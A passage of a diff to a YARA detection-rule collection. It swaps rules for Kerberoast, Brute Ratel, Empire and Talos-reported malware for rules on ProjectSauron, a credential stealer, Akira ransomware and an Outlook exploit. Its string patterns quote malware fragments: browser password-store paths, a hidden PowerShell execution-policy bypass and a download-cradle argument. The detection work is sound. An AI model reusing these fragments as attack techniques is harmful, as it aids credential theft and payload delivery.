+		$s4 = "$_REQUEST" fullword
+		$s5 = ";eval("
+		$s6 = "base64_decode"
+		$fp1 = "<form name=\"social_form\""
 
 	condition:
-		2 of them
+		uint32( 0 ) == 0x38464947 and ( 1 of ( $s* ) ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Kerberoast_PY
+rule SIGNATURE_BASE_Apt_Projectsauron_Pipe_Backdoor : FILE
 {
 	meta:
-		description = "Auto-generated rule - file kerberoast.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cea6cdb2-cd1a-5701-a9d1-27c788a962a7"
-		date = "2016-05-21"
+		description = "Rule to detect ProjectSauron pipe backdoors"
+		author = "Kaspersky Lab"
+		id = "5a1dd4b3-a03c-51bb-a7bc-25729b487f70"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://github.com/skelsec/PyKerberoast"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_kerberoast.yar#L43-L59"
+		reference = "https://securelist.com/blog/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron.yara#L4-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3b285cc55733bd4c499ffb4821a92675806bf66faf3b3565ffb6de867bed538d"
+		logic_hash = "72f6c6fa65f15e4bab18a0f9d5b5b2f571b21d70c7ff306020784ce604a2e0a5"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "73155949b4344db2ae511ec8cab85da1ccbf2dfec3607fb9acdc281357cdf380"
+		tags = "FILE"
+		version = "1.0"
 
 	strings:
-		$s1 = "newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)" fullword ascii
-		$s2 = "key = kerberos.ntlmhash(args.password)" fullword ascii
-		$s3 = "help='the password used to decrypt/encrypt the ticket')" fullword ascii
-		$s4 = "newencserverticket = kerberos.encrypt(key, 2, e, nonce)" fullword ascii
+		$a1 = "CreateNamedPipeW" fullword ascii
+		$a2 = "SetSecurityDescriptorDacl" fullword ascii
+		$a3 = "GetOverlappedResult" fullword ascii
+		$a4 = "TerminateThread" fullword ascii
+		$a5 = "%s%s%X" fullword wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) ) and filesize < 100000
 }
 
-rule SIGNATURE_BASE_Brc4_Shellcode
+rule SIGNATURE_BASE_Apt_Projectsauron_Encrypted_LSA : FILE
 {
 	meta:
-		description = "Hunts for shellcode opcode used in Badger x86/x64 till release v1.2.9"
-		author = "@ninjaparanoid"
-		id = "7e899d2f-332b-53f7-b9e6-cfde2bce6223"
-		date = "2022-11-19"
+		description = "Rule to detect ProjectSauron encrypted LSA samples"
+		author = "Kaspersky Lab"
+		id = "f6fd8619-60f0-5c0d-aa66-cd0e154de63c"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://github.com/paranoidninja/Brute-Ratel-C4-Community-Kit/blob/main/deprecated/brc4.yara"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/hktl_bruteratel_c4.yar#L263-L290"
+		reference = "https://securelist.com/blog/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron.yara#L23-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a2816eb0316cebc96569847c17eae3bc50b988b07aa471176a09695fcefc21ec"
+		logic_hash = "aaeee77b596e304836e23241fdc602d0ffed3379b386724210859c84033ac2b5"
 		score = 75
-		quality = 83
-		tags = ""
-		version = "last version"
-		arch_context = "x64"
+		quality = 60
+		tags = "FILE"
+		version = "1.0"
 
 	strings:
-		$shellcode_x64_Start = { 55 50 53 51 52 56 57 41 50 41 51 41 52 41 53 41 54 41 55 41 56 41 57 }
-		$shellcode_x64_End = { 5B 5E 5F 41 5C 41 5D 41 5E 41 5F 5D C3 }
-		$shellcode_x64_StageEnd = { 5C 41 5F 41 5E 41 5D 41 5C 41 5B 41 5A 41 59 41 58 5F 5E 5A 59 5B 58 5D C3 }
-		$funcHash1 = { 5B BC 4A 6A }
-		$funcHash2 = { 5D 68 FA 3C }
-		$funcHash3 = { AA FC 0D 7C }
-		$funcHash4 = { 8E 4E 0E EC }
-		$funcHash5 = { B8 12 DA 00 }
-		$funcHash6 = { 07 C4 4C E5 }
-		$funcHash7 = { BD CA 3B D3 }
-		$funcHash8 = { 89 4D 39 8C }
-		$hashFuncx64 = { EB 20 0F 1F 44 00 00 44 0F B6 C8 4C 89 DA 41 83 E9 20 4D 63 C1 4B 8D 04 10 49 39 CB 74 21 49 83 C3 01 41 89 C2 }
-		$hashFuncx86 = { EB 07 8D 74 26 00 83 C2 01 0F B6 31 C1 C8 0D 89 F1 8D 5C 30 E0 01 F0 80 F9 61 89 D1 0F 43 C3 39 D7 75 E3 }
+		$a1 = "EFEB0A9C6ABA4CF5958F41DB6A31929776C643DEDC65CC9B67AB8B0066FF2492" fullword ascii
+		$a2 = "\\Device\\NdisRaw_" ascii
+		$a3 = "\\\\.\\GLOBALROOT\\Device\\{8EDB44DC-86F0-4E0E-8068-BD2CABA4057A}" fullword wide
+		$a4 = "Global\\{a07f6ba7-8383-4104-a154-e582e85a32eb}" fullword wide
+		$a5 = "Missing function %S::#%d" fullword wide
+		$a6 = {8945D08D8598FEFFFF2BD08945D88D45BC83C20450C745C0030000008975C48955DCFF55FC8BF88D8F0000003A83F90977305333DB53FF15}
+		$a7 = {488D4C24304889442450488D452044886424304889442460488D4520C7442434030000002BD848897C243844896C244083C308895C246841FFD68D880000003A8BD883F909772DFF}
 
 	condition:
-		(pe.machine == pe.MACHINE_AMD64 and ( 2 of ( $shellcode* ) or all of ( $funcHash* ) and $hashFuncx64 ) ) or ( pe.machine == pe.MACHINE_I386 and ( all of ( $funcHash* ) and $hashFuncx86 ) )
+		uint16( 0 ) == 0x5A4D and ( any of ( $a* ) or ( pe.exports ( "InitializeChangeNotify" ) and pe.exports ( "PasswordChangeNotify" ) and math.entropy ( 0x400 , filesize ) >= 7.5 ) ) and filesize < 1000000
 }
-rule SIGNATURE_BASE_Andromeda_Malbot_Jun_1A : FILE
+
+rule SIGNATURE_BASE_Apt_Projectsauron_Encrypted_SSPI : FILE
 {
 	meta:
-		description = "Detects a malicious Worm Andromeda / RETADUP"
-		author = "Florian Roth (Nextron Systems)"
-		id = "42ee6ba3-85ea-5369-bd9b-8ffdec6e17bc"
-		date = "2017-06-30"
-		modified = "2022-12-21"
-		reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_andromeda_jun17.yar#L12-L38"
+		description = "Rule to detect encrypted ProjectSauron SSPI samples"
+		author = "Kaspersky Lab"
+		id = "43c0e772-46d2-510e-bea1-6f505199f38c"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron.yara#L49-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5958608ad5527628c4b6cbe08badbff39a50dcdb6cf603f6fbb5fa32ef61c0c7"
+		logic_hash = "99d7444ffc45076e97ac3f5c9909ae26a927bbdcfef274d12d162c59e8113d65"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9"
-		hash2 = "73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98"
-		hash3 = "66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4"
-		hash4 = "42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed"
-
-	strings:
-		$x1 = "%temp%\\FolderN\\name.exe" fullword wide
-		$x2 = "%temp%\\FolderN\\name.exe.lnk" fullword wide
-		$x3 = "\\Startup\\name.exe" wide
-		$x4 = "firefox.exe.exe" fullword wide
-		$x5 = "\\Desktop\\New folder\\dark.exe" wide
-		$x6 = "\\x86\\Release\\word.pdb" ascii
-		$x7 = "\\obj\\Release\\botkill.pdb" ascii
-		$s1 = "4System.Web.Services.Protocols.SoapHttpClientProtocol" fullword ascii
-		$s2 = "svhost.exe" fullword wide
+		version = "1.0"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 2 of them )
+		uint16( 0 ) == 0x5A4D and filesize < 1000000 and pe.exports ( "InitSecurityInterfaceA" ) and pe.characteristics & pe.DLL and ( pe.machine == pe.MACHINE_AMD64 or pe.machine == pe.MACHINE_IA64 ) and math.entropy ( 0x400 , filesize ) >= 7.5
 }
-
-rule SIGNATURE_BASE_ME_Campaign_Malware_1 : FILE
+rule SIGNATURE_BASE_Apt_Projectsauron_Mytrampoline : FILE
 {
 	meta:
-		description = "Detects malware from Middle Eastern campaign reported by Talos"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7c844c5c-caf0-5968-ac1a-72886fcf97cf"
-		date = "2018-02-07"
+		description = "Rule to detect ProjectSauron MyTrampoline module"
+		author = "Kaspersky Lab"
+		id = "b4f2cabf-11da-5fa1-8c23-0a177f8a4741"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_middle_east_talosreport.yar#L13-L26"
+		reference = "https://securelist.com/blog/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron.yara#L65-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e5ea689de4be64a02aed31c85a4bd56561ba932587998bc276ddba248d73fa2d"
+		logic_hash = "0bd98815fbf6e82cf477e4f4f98360a4c132b2b21e2e5991f6c10903bd4df52b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1176642841762b3bc1f401a5987dc55ae4b007367e98740188468642ffbd474e"
+		version = "1.0"
+
+	strings:
+		$a1 = ":\\System Volume Information\\{" wide
+		$a2 = "\\\\.\\PhysicalDrive%d" wide
+		$a3 = "DMWndClassX%d"
+		$b1 = "{774476DF-C00F-4e3a-BF4A-6D8618CFA532}" ascii wide
+		$b2 = "{820C02A4-578A-4750-A409-62C98F5E9237}" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( pe.imphash ( ) == "618f76eaf4bd95c690d43e84d617efe9" )
+		uint16( 0 ) == 0x5A4D and filesize < 5000000 and ( all of ( $a* ) or any of ( $b* ) )
 }
 
-rule SIGNATURE_BASE_ME_Campaign_Malware_2 : FILE
+rule SIGNATURE_BASE_Apt_Projectsauron_Encrypted_Container : FILE
 {
 	meta:
-		description = "Detects malware from Middle Eastern campaign reported by Talos"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a0beec30-62ff-54c3-ab62-c54454b89f8d"
-		date = "2018-02-07"
+		description = "Rule to detect ProjectSauron samples encrypted container"
+		author = "Kaspersky Lab"
+		id = "4462ebd9-24eb-570a-94b8-6fa6bf2a5a63"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_middle_east_talosreport.yar#L28-L48"
+		reference = "https://securelist.com/blog/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron.yara#L85-L103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "414e7760c56d2a1713258bb5c5f65e4fb561523ae037f8715d7fba5914ef9211"
+		logic_hash = "9b36f2f1161fd2ff856db520efca8648892656b7a2587dce1a7445af4fbba013"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "76a9b603f1f901020f65358f1cbf94c1a427d9019f004a99aa8bff1dea01a881"
+		version = "1.0"
 
 	strings:
-		$s1 = "QuickAssist.exe" fullword wide
-		$s2 = "<description>Microsoft Modern Sharing Solution</description>" fullword ascii
-		$s3 = "GBEWCWA" fullword ascii
-		$s4 = "name=\"QuickAssist\" " fullword ascii
-		$s5 = "Cimzal" fullword ascii
+		$vfs_header = {02 AA 02 C1 02 0?}
+		$salt = {91 0A E0 CC 0D FE CE 36 78 48 9B 9C 97 F7 F5 55}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "b06055e6cc2a804111ab6964df1ca4ae" or 4 of them )
+		uint16( 0 ) == 0x5A4D and ( ( @vfs_header < 0x4000 ) or $salt ) and math.entropy ( 0x400 , filesize ) >= 6.5 and ( filesize > 0x400 ) and filesize < 10000000
 }
-rule SIGNATURE_BASE_ME_Campaign_Malware_3 : FILE
+rule SIGNATURE_BASE_Apt_Projectsauron_Encryption : FILE
 {
 	meta:
-		description = "Detects malware from Middle Eastern campaign reported by Talos"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d8bfd426-ff42-5332-8206-67a558509494"
-		date = "2018-02-07"
+		description = "Rule to detect ProjectSauron string encryption"
+		author = "Kaspersky Lab"
+		id = "b3139045-54f5-5d59-980b-8510faa9ad0e"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_middle_east_talosreport.yar#L50-L66"
+		reference = "https://securelist.com/blog/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron.yara#L105-L123"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7d45f9f624285ed13a16901335585490459f22ef8af157c38b720118735ed432"
+		logic_hash = "ae3a681b0cf9ed93d25fa35982daab48c460ba9737eb643ba28a972ea3a7b401"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b"
+		version = "1.0"
 
 	strings:
-		$x1 = "objWShell.Run \"powershell.exe -ExecutionPolicy Bypass -File \"\"%appdata%\"\"\\sys.ps1\", 0 " fullword ascii
-		$x2 = "objFile.WriteLine \"New-Item -Path \"\"$ENV:APPDATA\\Microsoft\\Templates\"\" -ItemType Directory -Force }\" " fullword ascii
-		$x3 = "objFile.WriteLine \"$path = \"\"$ENV:APPDATA\\Microsoft\\Templates\\Report.doc\"\"\" " fullword ascii
-		$s4 = "File=appData & \"\\sys.ps1\"" fullword ascii
+		$a1 = {81??02AA02C175??8B??0685}
+		$a2 = {918D9A94CDCC939A93939BD18B9AB8DE9C908DAF8D9B9BBE8C8C9AFF}
+		$a3 = {803E225775??807E019F75??807E02BE75??807E0309}
 
 	condition:
-		uint16( 0 ) == 0x6553 and filesize < 400KB and 1 of them
+		filesize < 5000000 and any of ( $a* )
 }
-
-rule SIGNATURE_BASE_ME_Campaign_Malware_4 : FILE
+rule SIGNATURE_BASE_Apt_Projectsauron_Generic_Pipe_Backdoor : FILE
 {
 	meta:
-		description = "Detects malware from Middle Eastern campaign reported by Talos"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1ff83ac6-e3f1-55e2-a811-e526b8235c78"
-		date = "2018-02-07"
+		description = "Rule to detect ProjectSauron generic pipe backdoors"
+		author = "Kaspersky Lab"
+		id = "77a82c67-7ee1-5d1f-ad75-28ce174e41bc"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_middle_east_talosreport.yar#L68-L79"
+		reference = "https://securelist.com/blog/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron.yara#L125-L144"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "83340b2d8f5f58f886eb318b80d7fbb0b9a4f5ad634db857edc405932f3ea5bc"
+		logic_hash = "ec8a311ec1bd98532c278f72c77e58edb5890db940046dfcd14adf1495e9de1e"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c5bfb5118a999d21e9f445ad6ccb08eb71bc7bd4de9e88a41be9cf732156c525"
+		version = "1.0"
+
+	strings:
+		$a = { C7 [2-3] 32 32 32 32 E8 }
+		$b = { 42 12 67 6B }
+		$c = { 25 31 5F 73 }
+		$d = "rand"
+		$e = "WS2_32"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and pe.imphash ( ) == "fb7da233a35ac523d6059fff543627ab"
+		uint16( 0 ) == 0x5A4D and ( all of them ) and filesize < 400000
 }
-rule SIGNATURE_BASE_ME_Campaign_Malware_5 : FILE
+rule SIGNATURE_BASE_Credentialstealer_Generic_Backdoor : FILE
 {
 	meta:
-		description = "Detects malware from Middle Eastern campaign reported by Talos"
+		description = "Detects credential stealer byed on many strings that indicate password store access"
 		author = "Florian Roth (Nextron Systems)"
-		id = "241a4236-2688-5920-87f7-eed33963ec60"
-		date = "2018-02-07"
-		modified = "2022-08-18"
-		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_middle_east_talosreport.yar#L81-L100"
+		id = "b3124f6c-4e18-562c-84d9-d51e086da446"
+		date = "2017-06-07"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_credstealer_generic.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b958a09be09de03e702a0653cf51148698b35c29bed90edbc3a65e485f0c3aa6"
+		logic_hash = "aa06291a91ac84f80cd2cbe5a01c2cbcc14cf6914da9d1234af9b3d833990551"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "d49e9fdfdce1e93615c406ae13ac5f6f68fb7e321ed4f275f328ac8146dd0fc1"
-		hash2 = "e66af059f37bdd35056d1bb6a1ba3695fc5ce333dc96b5a7d7cc9167e32571c5"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "edb2d039a57181acf95bd91b2a20bd9f1d66f3ece18506d4ad870ab65e568f2c"
 
 	strings:
-		$s1 = "D:\\me\\do\\do\\obj\\" ascii
-		$s2 = "Select * from Win32_ComputerSystem" fullword wide
-		$s3 = "Get_Antivirus" fullword ascii
-		$s4 = "{{\"id\":\"{0}\",\"user\":\"{1}\",\"path\":\"{2}\"}}" fullword wide
-		$s5 = "update software online" fullword wide
-		$s6 = "time.nist.gov" fullword wide
+		$s1 = "GetOperaLoginData" fullword ascii
+		$s2 = "GetInternetExplorerCredentialsPasswords" fullword ascii
+		$s3 = "%s\\Opera Software\\Opera Stable\\Login Data" fullword ascii
+		$s4 = "select *  from moz_logins" fullword ascii
+		$s5 = "%s\\Google\\Chrome\\User Data\\Default\\Login Data" fullword ascii
+		$s6 = "Host.dll.Windows" fullword ascii
+		$s7 = "GetInternetExplorerVaultPasswords" fullword ascii
+		$s8 = "GetWindowsLiveMessengerPasswords" fullword ascii
+		$s9 = "%s\\Chromium\\User Data\\Default\\Login Data" fullword ascii
+		$s10 = "%s\\Opera\\Opera\\profile\\wand.dat" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and 5 of them or all of them
+		( uint16( 0 ) == 0x5a4d and 4 of them )
 }
-rule SIGNATURE_BASE_HKTL_Khepri_Beacon_Sep21_1 : FILE
+rule SIGNATURE_BASE_SUSP_BAT_Aux_Jan20_1 : FILE
 {
 	meta:
-		description = "Detects Khepri C2 framework beacons"
+		description = "Detects BAT file often dropped to cleanup temp dirs during infection"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b2c8aaf7-7953-55a3-8499-565800fa01f1"
-		date = "2021-09-08"
+		id = "c97f189e-a0c2-532e-b087-8669da72a2ad"
+		date = "2020-01-29"
 		modified = "2023-12-05"
-		reference = "https://github.com/geemion/Khepri/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_khepri.yar#L2-L44"
+		reference = "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_bat_aux.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c688dbda6006ef28305285f6aeec24a23cbfe9174d09cf4e3586bd0cf7290e60"
-		score = 90
+		logic_hash = "6b8cd9b7683a18a02a81222d6819fe903500702c83f198f73ac428d1bc91fb9a"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		hash1 = "86c48679db5f4c085fd741ebec5235bc6cf0cdf8ef2d98fd8a689ceb5088f431"
+		hash1 = "f5d558ec505b635b1e37557350562ad6f79b3da5cf2cf74db6e6e648b7a47127"
 
 	strings:
-		$x1 = "NT %d.%d Build %d  ProductType:%s" ascii fullword
-		$xe1 = "YzIuQ01EUEFSQU0uY21k" ascii
-		$xe2 = "MyLkNNRFBBUkFNLmNtZ" ascii
-		$xe3 = "jMi5DTURQQVJBTS5jbW" ascii
-		$sx1 = "c2.ProcessItem.user" ascii fullword
-		$sx2 = "c2.CMDPARAM.cmd" ascii fullword
-		$sx3 = "c2.DownLoadFile.file_path" ascii fullword
-		$sa1 = "file size zero"
-		$sa2 = "cmd.exe /c "
-		$sa3 = "error parse param"
-		$sa4 = "innet_ip"
-		$op1 = { c3 b9 b4 98 49 00 87 01 5d c3 b8 b8 98 49 00 c3 8b ff }
-		$op2 = { 8b f1 80 3d 58 97 49 00 00 0f 85 96 00 00 00 33 c0 40 b9 50 97 49 00 87 01 33 db }
-		$op3 = { 90 d5 0c 43 00 34 0d 43 00 ea 0c 43 00 7e 0d 43 00 b6 0d 43 00 cc }
-		$op4 = { 69 c0 ff 00 00 00 8b 4d c0 23 88 40 7c 49 00 89 4d c0 8b 45 cc 0b 45 c0 89 45 cc 8b 45 d0 }
+		$s1 = "if exist \"C:\\Users\\" ascii
+		$s2 = "\\AppData\\Local\\Temp\\" ascii
+		$s3 = "del \"C:\\Users\\" ascii
+		$s4 = ".bat\"" ascii
+		$s5 = ".exe\" goto" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint32be( 0 ) == 0x7f454c46 ) and filesize < 2000KB and ( 1 of ( $x* ) or 2 of ( $sx* ) or all of ( $sa* ) or 3 of ( $op* ) ) or ( filesize < 10MB and 1 of ( $xe* ) ) or 5 of them
+		uint8( 0 ) == 0x3a and filesize <= 1KB and all of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Metasploitpayload : FILE
+rule SIGNATURE_BASE_MAL_WIN_Akira_Apr25 : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-MetasploitPayload.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "608c30b0-826a-55b1-afb8-756b476d6b55"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L10-L24"
+		description = "This Yara rule from ISH Tecnologia's Heimdall Security Research Team detects key components of Akira Ransomware"
+		author = "0x0d4y-Icaro Cesar"
+		id = "76722cb6-70be-465f-9ef1-afd78f694289"
+		date = "2025-04-11"
+		modified = "2025-04-16"
+		reference = "https://ish.com.br/wp-content/uploads/2025/04/A-Anatomia-do-Ransomware-Akira-e-sua-expansao-multiplataforma.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_win_akira_apr25.yar#L1-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1399818f71544245a7b689a7eb4da794b10814590e4c5f545fc28237ffa3d0f6"
-		score = 75
+		hash = "205589629ead5d3c1d9e914b49c08589"
+		logic_hash = "112f844dff4c48d861f86736503da51e8fbc58805f463df1f9358781034f2e24"
+		score = 90
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a85ca27537ebeb79601b885b35ddff6431860b5852c6a664d32a321782808c54"
+		rule_matching_tlp = "TLP:WHITE"
+		rule_sharing_tlp = "TLP:WHITE"
+		malpedia_family = "win.akira"
 
 	strings:
-		$s1 = "$ProcessInfo.Arguments=\"-nop -c $DownloadCradle\"" fullword ascii
-		$s2 = "$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'" fullword ascii
+		$code_custom_algorithm = { 44 8B CF 90 42 0F B6 4C 0D ?? 83 E9 4E 44 8D 04 89 45 03 C0 B8 09 04 02 81 41 F7 E8 41 03 D0 C1 FA 06 8B C2 C1 E8 1F 03 D0 6B C2 7F 44 2B C0 41 83 C0 7F B8 09 04 02 81 41 F7 E8 41 03 D0 C1 FA 06 8B C2 C1 E8 1F 03 D0 6B C2 7F 44 2B C0 46 88 44 0D ?? 49 FF C1 }
+		$code_aes_key_expansion = { 41 8D 41 FF 33 D2 8B 0C ?? 41 8B C1 41 F7 F2 85 D2 75 ?? 44 8B C1 0F B6 C1 0F B6 0C ?? 41 8B C0 48 C1 E8 ?? C1 E1 ?? 0F B6 04 ?? 0B C8 41 8B C0 48 C1 E8 ?? C1 E1 ?? 0F B6 D0 49 C1 E8 ?? 0F B6 04 ?? 0B C8 41 0F B6 C0 C1 E1 ?? 0F B6 14 ?? 0F B6 45 00 0B CA 33 C8 48 FF C5 }
+		$akira_str_I = "akira" ascii
+		$akira_str_II = "onion" ascii
+		$akira_str_III = "powershell" ascii
+		$akira_str_IV = "akira_readme.txt" ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 9KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and all of ( $code_* ) and all of ( $akira_str_* )
 }
-rule SIGNATURE_BASE_Empire_Exploit_Jenkins : FILE
+rule SIGNATURE_BASE_EXPL_CVE_2024_21413_Microsoft_Outlook_RCE_Feb24 : CVE_2024_21413 FILE
 {
 	meta:
-		description = "Detects Empire component - file Exploit-Jenkins.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f2162783-34cd-5db4-bd1c-6c58feb92e77"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L26-L41"
+		description = "Detects emails that contain signs of a method to exploit CVE-2024-21413 in Microsoft Outlook"
+		author = "X__Junior, Florian Roth"
+		id = "4512ca7b-0755-565e-84f1-596552949aa5"
+		date = "2024-02-17"
+		modified = "2024-02-19"
+		reference = "https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_outlook_cve_2024_21413.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "caf65814a1aeb0e14ec6430f7d5692b9c090bdc0d453566f0b0abd703f74bac7"
+		logic_hash = "06cfafe0b92949e493dca6d54f671d0607242d97341144b69f563a0cc24dc6a1"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a5182cccd82bb9984b804b365e07baba78344108f225b94bd12a59081f680729"
+		quality = 60
+		tags = "CVE-2024-21413, FILE"
 
 	strings:
